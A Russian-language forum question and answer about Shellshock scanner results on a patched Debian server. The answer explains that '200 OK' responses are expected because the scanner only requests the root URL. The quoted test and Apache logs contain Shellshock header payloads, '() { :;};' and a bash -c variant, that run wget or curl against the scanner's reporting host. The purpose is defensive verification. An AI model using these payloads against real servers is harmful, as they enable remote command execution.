Тест ShellShock показывает доступ к wget и curl
Я исправил ошибку shellshock на моем сервере Debian 6 и во время тестирования на http://shellshock.brandonpotter.com/ я получил сообщение "Уязвимости не найдено", и это нормально, но они также проверяют другие вещи, и в журнале испытаний я получаю:
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; curl)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'curl)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/local/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/bin/wget)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; wget)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; curl)... 200 OK
URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK
...
...
...
"200 ОК" это нормально? 200 означает доступный. Я проверил пару других доменов, и некоторые из них показывают также "200 OK", но другие показывают "Ошибка".
Это может остаться так или я должен это исправить? Если да, как я могу это сделать?
1 ответ
Я проверил это на своем сайте, вам не нужно беспокоиться.
Этот сайт делает некоторые тесты на /
они не вызывают специфический cgi-скрипт. И это приводит к 200 OK, независимо от того, что пытается использовать переданный реферер или пользовательский агент.
Это пример того, что показывает мой журнал apache:
75.127.84.182 - - [22/Oct/2014:11:52:54 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-wget'" "-"
75.127.84.182 - - [22/Oct/2014:11:52:55 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-curl'" "-"